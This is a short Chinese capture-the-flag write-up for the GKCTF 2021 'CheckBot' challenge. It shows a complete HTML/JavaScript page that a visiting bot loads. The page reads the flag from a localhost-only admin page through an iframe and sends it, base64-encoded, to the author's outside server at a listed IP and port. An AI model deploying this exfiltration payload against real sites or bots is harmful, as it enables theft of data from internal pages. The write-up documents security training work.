[GKCTF 2021]CheckBot
这题一进去源代码处有提示,把uri通过post方式给它
在admin.php处发现flag,但应该要本地访问才行,这题bot会点击我们发过去的链接,那就整个csrf吧
把下面的代码放在自己的vps上,然后把网址发过去让bot去访问,bot访问后会把flag发到我们监听的端口这,就可以成功获取flag
<html>
<body>
<iframe id="flag" src="http://127.0.0.1/admin.php"></iframe>
<script>
window.onload = function(){
/* Prepare flag */
let flag = document.getElementById("flag").contentWindow.document.getElementById("flag").innerHTML;
/* Export flag */
var exportFlag = new XMLHttpRequest();
exportFlag.open('get', 'http://42.193.22.50:6663/flagis-' + window.btoa(flag));
exportFlag.send();
}
</script>
</body>
</html>
这里发过去也提示了要等一会,这里确实得有点耐心
总结
这题考点是csrf,比较少见,这里贴个链接可以学习下CSRF